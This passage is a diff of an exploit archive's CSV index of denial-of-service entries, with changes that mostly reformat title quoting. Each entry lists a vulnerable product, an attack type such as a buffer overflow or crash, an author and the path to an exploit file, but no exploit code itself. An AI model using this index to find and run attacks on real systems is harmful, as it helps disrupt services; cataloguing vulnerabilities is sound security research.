win-c-sample.exe Buffer Overflow",1997-01-06,"Solar Designer",windows,dos,0 +20484,platforms/windows/dos/20484.txt,"OReilly WebSite 1.x/2.0 - 'win-c-sample.exe' Buffer Overflow",1997-01-06,"Solar Designer",windows,dos,0 20487,platforms/hardware/dos/20487.pl,"Watchguard SOHO 2.2 - Denial of Service",2000-12-08,"Filip Maertens",hardware,dos,0 20494,platforms/linux/dos/20494.pl,"RedHat Linux 7.0 - Roaring Penguin PPPoE Denial of Service",2000-12-11,dethy,linux,dos,0 20508,platforms/windows/dos/20508.txt,"Microsoft NT 4.0 RAS/PPTP - Malformed Control Packet Denial of Service",1999-04-27,"Simon Helson",windows,dos,0 20509,platforms/hardware/dos/20509.pl,"Cisco Catalyst 4000/5000/6000 6.1 - SSH Protocol Mismatch Denial of Service",2000-12-13,blackangels,hardware,dos,0 -20515,platforms/windows/dos/20515.txt,"Microsoft Internet Explorer 5.0.1/5.5 - 'mstask.exe' CPU Consumption",2000-12-13,"Ilia Sprite",windows,dos,0 +20515,platforms/windows/dos/20515.txt,"Microsoft Internet Explorer 5.0.1/5.5 - 'mstask.exe' CPU Consumption (Denial of Service)",2000-12-13,"Ilia Sprite",windows,dos,0 20518,platforms/windows/dos/20518.txt,"Infinite Interchange 3.61 - Denial of Service",2000-12-21,"SNS Research",windows,dos,0 20531,platforms/multiple/dos/20531.txt,"IBM HTTP Server 1.3 - AfpaCache/WebSphereNet.Data Denial of Service",2001-01-08,"Peter Grundl",multiple,dos,0 20532,platforms/sco/dos/20532.txt,"ScreenOS 1.73/2.x - Firewall Denial of Service",2001-01-08,Nsfocus,sco,dos,0 @@ -2561,7 +2561,7 @@ id,file,description,date,author,platform,type,port 21006,platforms/windows/dos/21006.txt,"MAILsweeper - SMTP 4.2.1 + F-Secure Anti-Virus 5.0.2 / 5.2.1 - File Scanner Malicious Archive Denial of Service",2001-07-12,"Michel Arboi",windows,dos,0 21012,platforms/multiple/dos/21012.c,"ID Software Quake 1.9 - Denial of Service",2001-07-17,"Andy Gavin",multiple,dos,0 40421,platforms/multiple/dos/40421.txt,"Adobe Flash - Crash When Freeing Memory After AVC decoding",2016-09-23,"Google Security Research",multiple,dos,0 -21016,platforms/windows/dos/21016.c,"ID Software Quake 3 - 'smurf attack' Denial of Service",2001-07-17,"Andy Gavin",windows,dos,0 +21016,platforms/windows/dos/21016.c,"ID Software Quake 3 - 'SMURF' Denial of Service",2001-07-17,"Andy Gavin",windows,dos,0 21028,platforms/hardware/dos/21028.pl,"Cisco IOS 12 - UDP Denial of Service",2001-07-25,blackangels,hardware,dos,0 40420,platforms/multiple/dos/40420.txt,"Adobe Flash - Video Decompression Memory Corruption",2016-09-23,"Google Security Research",multiple,dos,0 21040,platforms/windows/dos/21040.txt,"Microsoft Windows 98 - ARP Denial of Service",2001-07-30,"Paul Starzetz",windows,dos,0 @@ -2620,7 +2620,7 @@ id,file,description,date,author,platform,type,port 21346,platforms/windows/dos/21346.html,"Microsoft Internet Explorer 5/6 / Mozilla 0.8/0.9.x / Opera 5/6 - JavaScript Interpreter Denial of Service",2002-03-19,"Patrik Birgersson",windows,dos,0 21366,platforms/windows/dos/21366.txt,"Microsoft Internet Explorer 5/6 / Outlook 2000/2002/5.5 / Word 2000/2002 - VBScript ActiveX Word Object Denial of Service",2002-04-08,"Elia Florio",windows,dos,0 21419,platforms/windows/dos/21419.txt,"Microsoft Outlook Express 5.5 - Denial of Service Device Denial of Service",2002-04-24,ERRor,windows,dos,0 -21379,platforms/multiple/dos/21379.pl,"Melange Chat System 2.0.2 Beta 2 - /yell Remote Buffer Overflow",2002-04-14,DVDMAN,multiple,dos,0 +21379,platforms/multiple/dos/21379.pl,"Melange Chat System 2.0.2 Beta 2 - '/yell' Remote Buffer Overflow",2002-04-14,DVDMAN,multiple,dos,0 21387,platforms/windows/dos/21387.txt,"WebTrends Reporting Center for Windows 4.0 d - GET Request Buffer Overflow",2002-04-17,"Mark Litchfield",windows,dos,0 21388,platforms/windows/dos/21388.c,"Microsoft Windows Server 2000 - Lanman Denial of Service (1)",2002-04-17,"Daniel Nystrom",windows,dos,0 21389,platforms/windows/dos/21389.txt,"Microsoft Windows Server 2000 - Lanman Denial of Service (2)",2003-01-03,ch0wn,windows,dos,0 @@ -2777,7 +2777,7 @@ id,file,description,date,author,platform,type,port 22239,platforms/windows/dos/22239.txt,"Opera 6.0/7.0 - 'Username' URI Warning Dialog Buffer Overflow",2003-02-10,nesumin,windows,dos,0 22240,platforms/windows/dos/22240.txt,"Opera 6.0/7.0 - opera.PluginContext Native Method Denial of Service",2003-01-13,"Marc Schoenefeld",windows,dos,0 22243,platforms/linux/dos/22243.txt,"RARLAB FAR 1.65/1.70 - File Manager Buffer Overflow",2003-02-11,3APA3A,linux,dos,0 -22245,platforms/windows/dos/22245.txt,"Microsoft Windows NT/2000 - cmd.exe CD Buffer Overflow",2003-02-11,3APA3A,windows,dos,0 +22245,platforms/windows/dos/22245.txt,"Microsoft Windows NT/2000 - 'cmd.exe' CD Buffer Overflow",2003-02-11,3APA3A,windows,dos,0 22249,platforms/aix/dos/22249.txt,"IBM AIX 4.3.3/5.1/5.2 libIM - Buffer Overflow",2003-02-12,"Euan Briggs",aix,dos,0 22250,platforms/multiple/dos/22250.sh,"iParty Conferencing Server - Denial of Service",1999-05-08,wh00t,multiple,dos,0 22255,platforms/windows/dos/22255.txt,"Microsoft Windows XP/95/98/2000/NT 4.0 - 'Riched20.dll' Attribute Buffer Overflow",2003-02-17,"Jie Dong",windows,dos,0 @@ -2967,7 +2967,7 @@ id,file,description,date,author,platform,type,port 23117,platforms/windows/dos/23117.txt,"FTP Desktop 3.5 - Banner Parsing Buffer Overflow",2003-09-08,"Bahaa Naamneh",windows,dos,0 23118,platforms/windows/dos/23118.txt,"FTP Desktop 3.5 - FTP 331 Server Response Buffer Overflow",2003-09-08,"Bahaa Naamneh",windows,dos,0 23124,platforms/windows/dos/23124.txt,"NullSoft Winamp 2.81/2.91/3.0/3.1 - MIDI Plugin 'IN_MIDI.dll' Track Data Size Buffer Overflow",2003-09-08,"Luigi Auriemma",windows,dos,0 -23130,platforms/windows/dos/23130.txt,"Gordano Messaging Suite 9.0 - WWW.exe Denial of Service",2003-09-10,"Phuong Nguyen",windows,dos,0 +23130,platforms/windows/dos/23130.txt,"Gordano Messaging Suite 9.0 - 'WWW.exe' Denial of Service",2003-09-10,"Phuong Nguyen",windows,dos,0 23138,platforms/linux/dos/23138.txt,"MySQL 3.23.x/4.0.x - Password Handler Buffer Overflow",2003-09-10,"Frank DENIS",linux,dos,0 23139,platforms/windows/dos/23139.txt,"myServer 0.4.x - 'cgi-lib.dll' Remote Buffer Overflow",2003-09-12,Moran,windows,dos,0 23142,platforms/multiple/dos/23142.txt,"WideChapter 3.0 - HTTP Request Buffer Overflow",2003-09-15,"Bahaa Naamneh",multiple,dos,0 @@ -3092,7 +3092,7 @@ id,file,description,date,author,platform,type,port 23713,platforms/windows/dos/23713.txt,"Vizer Web Server 1.9.1 - Remote Denial of Service",2004-02-17,"Donato Ferrante",windows,dos,0 23715,platforms/windows/dos/23715.pl,"TransSoft Broker FTP Server 6.1 - Denial of Service",2004-02-17,SecuriTeam,windows,dos,0 23716,platforms/windows/dos/23716.txt,"SmallFTPd 1.0.3 - Remote Denial of Service",2004-02-17,"intuit e.b.",windows,dos,0 -23731,platforms/windows/dos/23731.txt,"TYPSoft FTP Server 1.1 - Remote CPU Consumption Denial of Service",2004-02-20,"intuit bug_hunter",windows,dos,0 +23731,platforms/windows/dos/23731.txt,"TYPSoft FTP Server 1.1 - Remote CPU Consumption (Denial of Service)",2004-02-20,"intuit bug_hunter",windows,dos,0 23750,platforms/php/dos/23750.txt,"RobotFTP Server 1.0/2.0 - Remote Unauthenticated Command Denial of Service",2004-02-24,"Zone-h Security Team",php,dos,0 23752,platforms/windows/dos/23752.c,"Digital Reality Game Engine 1.0.x - Remote Denial of Service",2004-02-24,"Luigi Auriemma",windows,dos,0 23755,platforms/multiple/dos/23755.txt,"RedStorm Ghost Recon Game Engine - Remote Denial of Service",2004-02-24,"Luigi Auriemma",multiple,dos,0 @@ -3116,7 +3116,7 @@ id,file,description,date,author,platform,type,port 23839,platforms/windows/dos/23839.pl,"GlobalScape Secure FTP Server 2.0 Build 03.11.2004.2 - Site Command Remote Buffer Overflow",2004-03-17,storm,windows,dos,0 23842,platforms/windows/dos/23842.pl,"WFTPD Server GUI 3.21 - Remote Denial of Service",2004-03-17,"Beyond Security",windows,dos,0 23846,platforms/windows/dos/23846.txt,"Symantec Client Firewall Products 5 - 'SYMNDIS.SYS' Driver Remote Denial of Service",2004-03-18,"eEye Digital Security Team",windows,dos,0 -23850,platforms/windows/dos/23850.txt,"Microsoft Windows XP - explorer.exe Remote Denial of Service",2004-03-19,"Rafel Ivgi The-Insider",windows,dos,0 +23850,platforms/windows/dos/23850.txt,"Microsoft Windows XP - 'explorer.exe' Remote Denial of Service",2004-03-19,"Rafel Ivgi The-Insider",windows,dos,0 23876,platforms/hardware/dos/23876.txt,"PicoPhone Internet Phone 1.63 - Remote Buffer Overflow",2004-03-24,"Luigi Auriemma",hardware,dos,0 23884,platforms/linux/dos/23884.txt,"NSTX 1.0/1.1 - Remote Denial of Service",2004-03-26,"laurent oudot",linux,dos,0 23896,platforms/linux/dos/23896.txt,"MPlayer 0.9/1.0 - Remote HTTP Header Buffer Overflow",2004-03-30,blexim,linux,dos,0 @@ -3170,7 +3170,7 @@ id,file,description,date,author,platform,type,port 24146,platforms/windows/dos/24146.bat,"Orenosv HTTP/FTP Server 0.5.9 - HTTP GET Denial of Service (2)",2004-06-02,CoolICE,windows,dos,0 24147,platforms/windows/dos/24147.bat,"Orenosv HTTP/FTP Server 0.5.9 - HTTP GET Denial of Service (3)",2004-06-02,CoolICE,windows,dos,0 24150,platforms/windows/dos/24150.pl,"Mollensoft Lightweight FTP Server 3.6 - Remote Buffer Overflow",2004-05-28,"Chintan Trivedi",windows,dos,0 -40399,platforms/windows/dos/40399.txt,"VMware Workstation - vprintproxy.exe JPEG2000 Images Multiple Memory Corruptions",2016-09-19,"Google Security Research",windows,dos,0 +40399,platforms/windows/dos/40399.txt,"VMware Workstation - 'vprintproxy.exe' JPEG2000 Images Multiple Memory Corruptions",2016-09-19,"Google Security Research",windows,dos,0 24170,platforms/multiple/dos/24170.txt,"Colin McRae Rally 2004 - Multiplayer Denial of Service",2004-06-04,"Luigi Auriemma",multiple,dos,0 24178,platforms/windows/dos/24178.txt,"ToCA Race Driver - Multiple Remote Denial of Service Vulnerabilities",2004-06-08,"Luigi Auriemma",windows,dos,0 24181,platforms/openbsd/dos/24181.sh,"OpenBSD 3.x - ISAKMPD Security Association Piggyback Delete Payload Denial of Service",2004-06-08,"Thomas Walpuski",openbsd,dos,0 @@ -3187,10 +3187,10 @@ id,file,description,date,author,platform,type,port 24267,platforms/windows/dos/24267.txt,"Microsoft Internet Explorer 6 - JavaScript Null Pointer Exception Denial of Service",2004-07-12,"Berend-Jan Wever",windows,dos,0 24275,platforms/unix/dos/24275.txt,"IBM Lotus Notes 6.0/6.5 - Multiple Java Applet Vulnerabilities",2004-07-13,"Jouko Pynnonen",unix,dos,0 24281,platforms/windows/dos/24281.pl,"Microsoft Systems Management Server 1.2/2.0 - Remote Denial of Service",2004-07-14,HexView,windows,dos,0 -24282,platforms/multiple/dos/24282.txt,"Gattaca Server 2003 - web.tmpl Language Variable CPU Consumption Denial of Service",2004-07-15,dr_insane,multiple,dos,0 +24282,platforms/multiple/dos/24282.txt,"Gattaca Server 2003 - 'web.tmpl' 'Language' Parameter CPU Consumption (Denial of Service)",2004-07-15,dr_insane,multiple,dos,0 24283,platforms/multiple/dos/24283.txt,"Gattaca Server 2003 POP3 - Denial of Service",2004-07-15,dr_insane,multiple,dos,0 24288,platforms/windows/dos/24288.txt,"Symantec Norton AntiVirus 2001/2002/2003/2004 - Script Blocker Denial of Service",2004-07-16,vozzie,windows,dos,0 -40398,platforms/windows/dos/40398.txt,"VMware Workstation - vprintproxy.exe TrueType NAME Tables Heap Buffer Overflow",2016-09-19,"Google Security Research",windows,dos,0 +40398,platforms/windows/dos/40398.txt,"VMware Workstation - 'vprintproxy.exe' TrueType NAME Tables Heap Buffer Overflow",2016-09-19,"Google Security Research",windows,dos,0 24305,platforms/multiple/dos/24305.txt,"PSCS VPOP3 2.0 - Email Server Remote Denial of Service",2004-07-22,dr_insane,multiple,dos,0 24319,platforms/windows/dos/24319.txt,"Aloaha PDF Crypter (3.5.0.1164) - ActiveX Arbitrary File Overwrite",2013-01-24,shinnai,windows,dos,0 24343,platforms/windows/dos/24343.txt,"MailEnable 1.1x - Content-Length Denial of Service",2004-07-30,CoolICE,windows,dos,0 @@ -3234,7 +3234,7 @@ id,file,description,date,author,platform,type,port 24596,platforms/unix/dos/24596.txt,"QNX Photon pkg-installer - -s Parameter Overflow",2004-09-13,"Julio Cesar Fort",unix,dos,0 24597,platforms/multiple/dos/24597.txt,"Mozilla Browser 1.7.x - Non-ASCII Hostname Heap Overflow",2004-09-14,"Mats Palmgren and Gael Delalleau",multiple,dos,0 24599,platforms/linux/dos/24599.txt,"CUPS 1.1.x - UDP Packet Remote Denial of Service",2004-09-15,"Alvaro Martinez Echevarria",linux,dos,0 -24605,platforms/windows/dos/24605.txt,"Microsoft Windows XP - explorer.exe .tiff Image Denial of Service",2004-09-16,"Jason Summers",windows,dos,0 +24605,platforms/windows/dos/24605.txt,"Microsoft Windows XP - 'explorer.exe' '.tiff' Image Denial of Service",2004-09-16,"Jason Summers",windows,dos,0 24610,platforms/multiple/dos/24610.txt,"DNS4Me 3.0 - Denial of Service / Cross-Site Scripting",2004-09-17,"James Bercegay",multiple,dos,0 24618,platforms/windows/dos/24618.c,"Impressions Games Lords of the Realm III - Nickname Remote Denial of Service",2004-09-20,"Luigi Auriemma",windows,dos,0 24619,platforms/cgi/dos/24619.txt,"EmuLive Server4 - Authentication Bypass / Denial of Service",2004-09-21,"James Bercegay",cgi,dos,0 @@ -3337,7 +3337,7 @@ id,file,description,date,author,platform,type,port 25234,platforms/linux/dos/25234.sh,"Linux Kernel 2.4.x / 2.6.x - Multiple Unspecified ISO9660 Filesystem Handling Vulnerabilities",2005-03-17,"Michal Zalewski",linux,dos,0 25255,platforms/windows/dos/25255.txt,"FUN labs Game Engine - Multiple Remote Denial of Service Vulnerabilities",2005-03-20,"Luigi Auriemma",windows,dos,0 25259,platforms/windows/dos/25259.py,"Microsoft Windows XP - Local Denial of Service",2005-03-22,liquid@cyberspace.org,windows,dos,0 -25268,platforms/windows/dos/25268.txt,"Microsoft Windows XP - TSShutdn.exe Remote Denial of Service",2005-03-23,"Juha-Matti Laurio",windows,dos,0 +25268,platforms/windows/dos/25268.txt,"Microsoft Windows XP - 'TSShutdn.exe' Remote Denial of Service",2005-03-23,"Juha-Matti Laurio",windows,dos,0 25277,platforms/hardware/dos/25277.txt,"Netcomm NB1300 Modem/Router - Remote Denial of Service",2005-03-25,"Chris Rock",hardware,dos,0 25281,platforms/windows/dos/25281.py,"Apple QuickTime 6.5.1 - PictureViewer Buffer Overflow",2005-03-26,liquid@cyberspace.org,windows,dos,0 25287,platforms/linux/dos/25287.c,"Linux Kernel 2.4.x / 2.6.x - BlueTooth Signed Buffer Index (PoC)",2005-03-28,"ilja van sprundel",linux,dos,0 @@ -3370,7 +3370,7 @@ id,file,description,date,author,platform,type,port 25584,platforms/multiple/dos/25584.txt,"Mtp-Target Server 1.2.2 - Memory Corruption",2005-05-02,"Luigi Auriemma",multiple,dos,0 25611,platforms/windows/dos/25611.txt,"Microsoft Windows - Win32k!EPATHOBJ::pprFlattenRec Uninitialized Next Pointer Testcase",2013-05-21,"Tavis Ormandy",windows,dos,0 25629,platforms/windows/dos/25629.pl,"Orenosv HTTP/FTP Server 0.8.1 - FTP Commands Remote Buffer Overflow",2008-05-08,Samsta,windows,dos,0 -25631,platforms/windows/dos/25631.txt,"Orenosv HTTP/FTP Server 0.8.1 - CGISSI.exe Remote Buffer Overflow",2005-05-09,"Tan Chew Keong",windows,dos,0 +25631,platforms/windows/dos/25631.txt,"Orenosv HTTP/FTP Server 0.8.1 - 'CGISSI.exe' Remote Buffer Overflow",2005-05-09,"Tan Chew Keong",windows,dos,0 25633,platforms/windows/dos/25633.txt,"AOL Instant Messenger 4.x/5.x - Smiley Icon Location Remote Denial of Service",2005-05-09,fjlj@wvi.com,windows,dos,0 25647,platforms/linux/dos/25647.sh,"Linux Kernel 2.2.x / 2.3.x / 2.4.x / 2.5.x / 2.6.x - ELF Core Dump Local Buffer Overflow",2005-05-11,"Paul Starzetz",linux,dos,0 25658,platforms/windows/dos/25658.txt,"Yahoo! Messenger 5.x/6.0 - URL Handler Remote Denial of Service",2005-05-13,"Torseq Tech",windows,dos,0 @@ -3383,7 +3383,7 @@ id,file,description,date,author,platform,type,port 25719,platforms/windows/dos/25719.txt,"Trend Micro DirectPass 1.5.0.1060 - Multiple Software Vulnerabilities",2013-05-26,Vulnerability-Lab,windows,dos,0 25736,platforms/hardware/dos/25736.txt,"Nokia 9500 - vCard Viewer Remote Denial of Service",2005-05-26,"Marek Bialoglowy",hardware,dos,0 25737,platforms/windows/dos/25737.txt,"Microsoft Windows 98SE - 'User32.dll' Icon Handling Denial of Service",2005-05-26,klistas,windows,dos,0 -25752,platforms/php/dos/25752.txt,"PHPMailer 1.7 - Data() Function Remote Denial of Service",2005-05-28,"Mariano Nunez Di Croce",php,dos,0 +25752,platforms/php/dos/25752.txt,"PHPMailer 1.7 - 'Data()' Function Remote Denial of Service",2005-05-28,"Mariano Nunez Di Croce",php,dos,0 25757,platforms/multiple/dos/25757.txt,"Firefly Studios Stronghold 2 - Remote Denial of Service",2005-05-28,"Luigi Auriemma",multiple,dos,0 25782,platforms/windows/dos/25782.txt,"HP OpenView Radia 2.0/3.1/4.0 - Notify Daemon Multiple Remote Buffer Overflow Vulnerabilities",2005-06-01,"John Cartwright",windows,dos,0 25791,platforms/multiple/dos/25791.txt,"Rakkarsoft RakNet 2.33 - Remote Denial of Service",2005-06-06,"Luigi Auriemma",multiple,dos,0 @@ -3456,7 +3456,7 @@ id,file,description,date,author,platform,type,port 26754,platforms/hardware/dos/26754.txt,"Check Point VPN-1 SecureClient 4.0 < 4.1 - Policy Bypass",2005-12-07,"Viktor Steinmann",hardware,dos,0 26762,platforms/multiple/dos/26762.html,"Mozilla Firefox 0.x/1.x - Large History File Buffer Overflow",2005-12-08,ZIPLOCK,multiple,dos,0 26769,platforms/windows/dos/26769.txt,"Microsoft Excel 95/97/2000/2002/2003/2004 - Malformed Range Memory Corruption",2005-12-08,fearwall,windows,dos,0 -26776,platforms/windows/dos/26776.txt,"Sights 'N Sounds Streaming Media Server 2.0.3 - SWS.exe Buffer Overflow",2005-12-12,dr_insane,windows,dos,0 +26776,platforms/windows/dos/26776.txt,"Sights 'N Sounds Streaming Media Server 2.0.3 - 'SWS.exe' Buffer Overflow",2005-12-12,dr_insane,windows,dos,0 26779,platforms/windows/dos/26779.txt,"Alt-N MDaemon WorldClient 8.1.3 - Denial of Service",2005-12-12,dr_insane,windows,dos,0 26802,platforms/hardware/dos/26802.py,"Tri-PLC Nano-10 r81 - Denial of Service",2013-07-13,Sapling,hardware,dos,0 26811,platforms/linux/dos/26811.c,"Linux Kernel 2.6.x - INVALIDATE_INODE_PAGES2 Local Integer Overflow",2005-12-13,"Oleg Drokin",linux,dos,0 @@ -3639,7 +3639,7 @@ id,file,description,date,author,platform,type,port 28463,platforms/windows/dos/28463.html,"SolarWinds Server and Application Monitor - ActiveX (Pepco32c) Buffer Overflow",2013-09-22,blake,windows,dos,0 28451,platforms/windows/dos/28451.txt,"Share KM 1.0.19 - Remote Denial of Service",2013-09-22,"Yuda Prawira",windows,dos,0 28469,platforms/windows/dos/28469.txt,"Internet Security Systems 3.6 BlackICE - Local Denial of Service",2006-09-01,"David Matousek",windows,dos,0 -28491,platforms/multiple/dos/28491.txt,"DSocks 1.3 - Name Variable Buffer Overflow",2006-09-05,"Michael Adams",multiple,dos,0 +28491,platforms/multiple/dos/28491.txt,"DSocks 1.3 - 'Name' Parameter Buffer Overflow",2006-09-05,"Michael Adams",multiple,dos,0 28513,platforms/windows/dos/28513.txt,"Paul Smith Computer Services VCAP Calendar Server 1.9 - Remote Denial of Service",2006-09-12,"securma massine",windows,dos,0 28521,platforms/osx/dos/28521.txt,"Apple QuickTime 6/7 - '.FLC' Movie COLOR_64 Chunk Overflow",2006-09-12,Sowhat,osx,dos,0 28542,platforms/multiple/dos/28542.pl,"Verso NetPerformer Frame Relay Access Device - Telnet Buffer Overflow",2006-09-13,"Arif Jatmoko",multiple,dos,0 @@ -3661,7 +3661,7 @@ id,file,description,date,author,platform,type,port 28812,platforms/freebsd/dos/28812.c,"FreeBSD 5.5/6.x - Scheduler Policy Local Denial of Service",2006-10-13,"Diane Bruce",freebsd,dos,0 28813,platforms/freebsd/dos/28813.c,"FreeBSD 6.0/6.1 Ftrucante - Local Denial of Service",2006-10-13,"Kirk Russell",freebsd,dos,0 28816,platforms/linux/dos/28816.txt,"KMail 1.x - HTML Element Handling Denial of Service",2006-10-16,nnp,linux,dos,0 -28822,platforms/windows/dos/28822.txt,"Microsoft Class Package Export Tool 5.0.2752 - Clspack.exe Local Buffer Overflow",2006-10-16,mmd_000,windows,dos,0 +28822,platforms/windows/dos/28822.txt,"Microsoft Class Package Export Tool 5.0.2752 - 'Clspack.exe' Local Buffer Overflow",2006-10-16,mmd_000,windows,dos,0 28834,platforms/windows/dos/28834.txt,"Microsoft Windows XP - 'cmd.exe' Buffer Overflow",2006-10-20,"Alberto Cortes",windows,dos,0 28852,platforms/hardware/dos/28852.py,"ONO Hitron CDE-30364 Router - Denial of Service",2013-10-10,"Matias Mingorance Svensson",hardware,dos,80 28855,platforms/windows/dos/28855.txt,"ALLPlayer 5.6.2 - '.m3u' Local Buffer Overflow (PoC)",2013-10-10,metacom,windows,dos,0 @@ -3674,7 +3674,7 @@ id,file,description,date,author,platform,type,port 28911,platforms/solaris/dos/28911.txt,"Sun Solaris 10 - UFS Local Denial of Service",2006-11-04,LMH,solaris,dos,0 28912,platforms/linux/dos/28912.txt,"Linux Kernel 2.6.x - 'ISO9660' Denial of Service",2006-11-05,LMH,linux,dos,0 28948,platforms/osx/dos/28948.c,"Apple Mac OSX 10.x - FPathConf System Call Local Denial of Service",2006-11-09,"ilja van sprundel",osx,dos,0 -28957,platforms/android/dos/28957.txt,"Android Zygote - Socket and Fork bomb Attack",2013-10-14,"Luca Verderame",android,dos,0 +28957,platforms/android/dos/28957.txt,"Android Zygote - Socket and Fork Bomb (Denial of Service)",2013-10-14,"Luca Verderame",android,dos,0 29007,platforms/osx/dos/29007.html,"Apple Safari 2.0.4 - JavaScript Regular Expression Match Remote Denial of Service",2006-11-14,jbh_cg,osx,dos,0 29036,platforms/windows/dos/29036.pl,"Teamtek Universal FTP Server - Multiple Commands Remote Denial of Service Vulnerabilities",2006-11-15,"Praveen Darhanam",windows,dos,0 29148,platforms/windows/dos/29148.txt,"ASF Demux for VideoLAN VLC Media Player 2.0.x - Denial of Service (PoC)",2013-10-23,"Pedro Ribeiro",windows,dos,0 @@ -3682,7 +3682,7 @@ id,file,description,date,author,platform,type,port 29144,platforms/osx/dos/29144.txt,"Apple Mac OSX 10.4.8 - UDIF Disk Image Remote Denial of Service",2006-11-20,LMH,osx,dos,0 29161,platforms/osx/dos/29161.txt,"Apple Mac OSX 10.4.8 - UDTO Disk Image Remote Denial of Service",2006-11-21,LMH,osx,dos,0 29164,platforms/windows/dos/29164.cpp,"FortKnox Personal Firewall 9.0.305.0 / 10.0.305.0 - Kernel Driver 'fortknoxfw.sys' Memory Corruption",2013-10-24,"Arash Allebrahim",windows,dos,0 -29170,platforms/windows/dos/29170.c,"Nvidia NView 3.5 - Keystone.exe Local Denial of Service",2006-11-23,Hessam-x,windows,dos,0 +29170,platforms/windows/dos/29170.c,"Nvidia NView 3.5 - 'Keystone.exe' Local Denial of Service",2006-11-23,Hessam-x,windows,dos,0 29172,platforms/windows/dos/29172.txt,"Microsoft Office 97 - HTMLMARQ.OCX Library Denial of Service",2006-11-22,"Michal Bucko",windows,dos,0 29204,platforms/netbsd_x86/dos/29204.pl,"NetBSD 3.1 FTPd / Tnftpd - Port Remote Buffer Overflow",2006-12-01,kcope,netbsd_x86,dos,0 29229,platforms/windows/dos/29229.txt,"Microsoft Internet Explorer 6 - Frame Src Denial of Service",2006-12-05,"Juan Pablo Lopez",windows,dos,0 @@ -3713,7 +3713,7 @@ id,file,description,date,author,platform,type,port 29455,platforms/windows/dos/29455.py,"RealNetwork RealPlayer 10.5 - '.MID' File Handling Remote Denial of Service",2007-01-15,shinnai,windows,dos,0 29458,platforms/linux/dos/29458.txt,"Libgtop2 Library - Local Buffer Overflow",2007-01-15,"Liu Qishuai",linux,dos,0 29461,platforms/osx/dos/29461.txt,"Apple WebKit build 18794 - WebCore Remote Denial of Service",2007-01-15,"Tom Ferris",osx,dos,0 -29463,platforms/windows/dos/29463.c,"Ipswitch WS_FTP 2007 Professional - WSFTPURL.exe Local Memory Corruption",2007-01-15,LMH,windows,dos,0 +29463,platforms/windows/dos/29463.c,"Ipswitch WS_FTP 2007 Professional - 'WSFTPURL.exe' Local Memory Corruption",2007-01-15,LMH,windows,dos,0 29470,platforms/linux/dos/29470.txt,"Oftpd 0.3.7 - Unsupported Address Family Remote Denial of Service",2007-01-15,anonymous,linux,dos,0 29502,platforms/multiple/dos/29502.html,"Transmit 3.5.5 - Remote Heap Overflow",2007-01-20,LMH,multiple,dos,0 29503,platforms/windows/dos/29503.py,"KarjaSoft Sami HTTP Server 1.0.4/1.0.5/2.0.1 - Request Remote Denial of Service",2007-01-22,shinnai,windows,dos,0 @@ -3924,7 +3924,7 @@ id,file,description,date,author,platform,type,port 31122,platforms/windows/dos/31122.txt,"Ipswitch Instant Messaging 2.0.8.1 - Multiple Vulnerabilities",2008-02-07,"Luigi Auriemma",windows,dos,0 31128,platforms/multiple/dos/31128.txt,"Multiple IEA Software Products - HTTP POST Request Denial of Service",2008-02-08,"Luigi Auriemma",multiple,dos,0 31136,platforms/multiple/dos/31136.txt,"cyan soft - Multiple Applications Format String and Denial of Service",2008-02-11,"Luigi Auriemma",multiple,dos,0 -31138,platforms/windows/dos/31138.txt,"Larson Network Print Server 9.4.2 build 105 - (LstNPS) NPSpcSVR.exe License Command Remote Overflow",2008-02-11,"Luigi Auriemma",windows,dos,0 +31138,platforms/windows/dos/31138.txt,"Larson Network Print Server 9.4.2 build 105 (LstNPS) - 'NPSpcSVR.exe' License Command Remote Overflow",2008-02-11,"Luigi Auriemma",windows,dos,0 31139,platforms/windows/dos/31139.txt,"Larson Network Print Server 9.4.2 build 105 - (LstNPS) Logging Function USEP Command Remote Format String",2008-02-11,"Luigi Auriemma",windows,dos,0 31148,platforms/multiple/dos/31148.txt,"Opium OPI Server and CyanPrintIP - Format String / Denial of Service",2008-02-11,"Luigi Auriemma",multiple,dos,0 31150,platforms/multiple/dos/31150.txt,"RPM Remote Print Manager 4.5.1 - Service Remote Buffer Overflow",2008-02-11,"Luigi Auriemma",multiple,dos,0 @@ -4015,7 +4015,7 @@ id,file,description,date,author,platform,type,port 31877,platforms/windows/dos/31877.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' 'RegistryString' Buffer Overflow",2008-06-04,"Dennis Rand",windows,dos,0 31878,platforms/windows/dos/31878.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' ActiveX Control Arbitrary File Creation",2008-06-03,"Dennis Rand",windows,dos,0 31879,platforms/windows/dos/31879.xml,"HP Instant Support 1.0.22 - 'HPISDataManager.dll' ActiveX Control Arbitrary File Delete",2008-06-03,"Dennis Rand",windows,dos,0 -31884,platforms/hardware/dos/31884.txt,"Linksys WRH54G 1.1.3 - (Wireless-G Router) Malformed HTTP Request Denial of Service",2008-06-05,dubingyao,hardware,dos,0 +31884,platforms/hardware/dos/31884.txt,"Linksys WRH54G 1.1.3 Wireless-G Router - Malformed HTTP Request Denial of Service",2008-06-05,dubingyao,hardware,dos,0 31889,platforms/novell/dos/31889.pl,"Novell Groupwise Messenger 2.0 Client - Buffer Overflow",2008-07-02,"Francisco Amato",novell,dos,0 31899,platforms/windows/dos/31899.txt,"VideoLAN VLC Media Player 2.1.3 - '.avs' Crash (PoC)",2014-02-25,kw4,windows,dos,0 31914,platforms/windows/dos/31914.pl,"Gold MP4 Player 3.3 - Buffer Overflow (PoC) (SEH)",2014-02-26,"Gabor Seljan",windows,dos,0 @@ -4620,7 +4620,7 @@ id,file,description,date,author,platform,type,port 37763,platforms/windows/dos/37763.txt,"NetServe FTP Client 1.0 - Local Denial of Service (Overflow)",2015-08-12,Un_N0n,windows,dos,0 37764,platforms/windows/dos/37764.html,"Microsoft Internet Explorer - CTreeNode::GetCascadedLang Use-After-Free (MS15-079)",2015-08-12,"Blue Frost Security GmbH",windows,dos,0 37766,platforms/multiple/dos/37766.py,"Google Chrome 43.0 - Certificate MIME Handling Integer Overflow",2015-08-13,"Paulos Yibelo",multiple,dos,0 -37775,platforms/windows/dos/37775.py,"Ability FTP Server 2.1.4 - afsmain.exe USER Command Remote Denial of Service",2015-08-15,St0rn,windows,dos,0 +37775,platforms/windows/dos/37775.py,"Ability FTP Server 2.1.4 - 'afsmain.exe' USER Command Remote Denial of Service",2015-08-15,St0rn,windows,dos,0 37776,platforms/windows/dos/37776.py,"Ability FTP Server 2.1.4 - Admin Panel AUTHCODE Command Remote Denial of Service",2015-08-15,St0rn,windows,dos,0 37777,platforms/linux/dos/37777.txt,"NetKit FTP Client (Ubuntu 